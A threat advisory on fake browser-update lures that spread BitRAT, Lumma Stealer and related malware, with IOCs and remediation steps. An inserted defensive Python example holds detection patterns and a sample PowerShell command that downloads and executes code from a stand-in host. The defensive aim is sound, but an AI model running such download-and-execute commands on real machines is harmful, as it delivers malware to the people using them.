Severity
High
Analysis Summary
Cybersecurity researchers have identified a surge in malware infections caused by fake web browser updates, which are being used to deliver remote access trojans (RATs) such as BitRAT and information-stealing malware such as Lumma Stealer.
These attacks typically begin when potential victims visit compromised websites that redirect them to fake browser update pages. The bogus pages prompt users to download a ZIP archive, "Update.zip", hosted on Discord. The archive contains a JavaScript file, "Update.js", which executes PowerShell scripts that download additional malware payloads disguised as PNG image files.
Discord has become a significant vector for these attacks with over 50,000 malicious links distributing various forms of malware, phishing campaigns, and spam over six months. The PowerShell scripts retrieved from these fake updates establish persistence on the victim’s device and utilize a .NET-based loader to deploy BitRAT and Lumma Stealer. BitRAT allows attackers to perform a variety of malicious activities including data harvesting, cryptocurrency mining, and remote control of infected hosts. Lumma Stealer, available for a subscription fee, targets sensitive information from web browsers and crypto wallets.
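Two defender-side checks for the chain described above (a JavaScript file run by a script host spawning hidden PowerShell, and payloads served with a .png name that are not PNG files), written as an added example that is not part of the original advisory. The process records and file bytes are constructed sample data; field layout and regexes are assumptions, not a vendor's detection rule.

```python
import re

# Magic bytes used to tell a real PNG from a disguised payload.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PE_MAGIC = b"MZ"

# Windows Script Host images that execute Update.js-style loaders.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Hidden-window or execution-policy-bypass switches commonly seen in the
# PowerShell stage (assumed pattern, tune to your own telemetry).
SUSPICIOUS_PS_SWITCHES = re.compile(
    r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass", re.IGNORECASE
)

# Constructed process-creation records: (parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("explorer.exe", "wscript.exe",
     r'wscript.exe "C:\Users\user\Downloads\Update\Update.js"'),
    ("wscript.exe", "powershell.exe",
     "powershell.exe -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/a.png'))"),
    ("explorer.exe", "powershell.exe",
     "powershell.exe -File C:\\Scripts\\inventory.ps1"),
    ("explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default"),
]


def flag_script_host_to_powershell(events):
    """Return command lines where a script host (the Update.js stage) spawns
    PowerShell with hidden-window or policy-bypass switches."""
    hits = []
    for parent, image, cmdline in events:
        if parent.lower() in SCRIPT_HOSTS and image.lower() == "powershell.exe":
            if SUSPICIOUS_PS_SWITCHES.search(cmdline):
                hits.append(cmdline)
    return hits


def classify_png_download(data: bytes) -> str:
    """Classify bytes fetched under a .png name: 'png' for a genuine image,
    'pe' for a Windows executable disguised as PNG, else 'unknown'."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(PE_MAGIC):
        return "pe"
    return "unknown"


if __name__ == "__main__":
    for hit in flag_script_host_to_powershell(SAMPLE_EVENTS):
        print("ALERT script host -> PowerShell:", hit)
    print(classify_png_download(b"MZ\x90\x00" + b"\x00" * 60))  # constructed PE header
```

The classifier is the check to run on anything a browser-update page hands back as an image, since the payloads in this campaign only borrow the PNG extension.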
The cybersecurity firm said that the prevalence of fake browser update lures is increasing as attackers capitalize on the trust users place in familiar software update prompts. These attacks typically utilize drive-by downloads and malvertising techniques. However, a new variant of the ClearFake campaign involves tricking users into manually executing malicious PowerShell code under the guise of a browser update.
Victims are misled into installing a root certificate and running obfuscated PowerShell code that downloads further malware including LummaC2. Lumma Stealer has become one of the most prevalent information stealers alongside RedLine and Raccoon, due to its high success rate in infiltrating systems and exfiltrating sensitive data. Its popularity among cybercriminals surged with logs of stolen data increasing by 110% from Q3 to Q4 2023. This effectiveness is partly due to its ability to evade detection and operate stealthily.
Researchers uncovered a campaign distributing malware through webhards, targeting users with malicious installers for adult games and cracked software. This campaign deploys various malware including Orcus RAT, XMRig miner, 3proxy, and XWorm. Similar attack chains involving pirated software sites lead to the deployment of malware loaders like PrivateLoader and TaskLoader offered as pay-per-install (PPI) services for other cybercriminals.
Moreover, the findings reveal that the CryptoChameleon phishing kit uses DNSPod[.]com nameservers for fast flux evasion, rapidly cycling through numerous IP addresses linked to a single domain. This tactic makes CryptoChameleon’s infrastructure more resilient against traditional countermeasures and complicates efforts to disrupt these persistent threats.
Impact
- Data Exfiltration
- Sensitive Information Theft
- Cryptocurrency Theft
Indicators of Compromise
IP
- 77.221.151.31
URL
- http://chatgpt-app.cloud/q1Vz6N
Remediation
- Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Ensure all operating systems and software are up to date with the latest security patches.
- Employ reliable antivirus and antimalware software to detect and block known threats.
- Regularly update these tools to maintain the latest threat intelligence.
- Implement intrusion detection and prevention systems (IDPS) to detect and block unusual network activity, anomalous system behavior, or similar threats.
- Enabling two-factor authentication (2FA) on your accounts adds an extra layer of security and can help prevent unauthorized access even if your login credentials have been stolen.
- Regularly backing up your important data can help ensure that you don’t lose any critical information in the event of a malware infection or other data loss event.
- Be wary of emails, attachments, and links from unknown sources. Also, avoid downloading software from untrusted sources or clicking on suspicious ads or pop-ups.
- Use email filtering solutions to block malicious attachments and links that may deliver malware to users via phishing emails.
- Segment your network to limit lateral movement for attackers.
- Employ application whitelisting to only allow approved software to run on systems, reducing the risk of unauthorized applications being executed.
- Implement robust monitoring solutions to detect any unusual or suspicious activities, such as unauthorized access attempts or data exfiltration. Establish an effective incident response plan to respond to and mitigate any potential breaches quickly.
- Make sure all of your software, including your operating system and applications, is up-to-date with the latest security patches. This can help prevent vulnerabilities that info-stealers and other types of malware could exploit.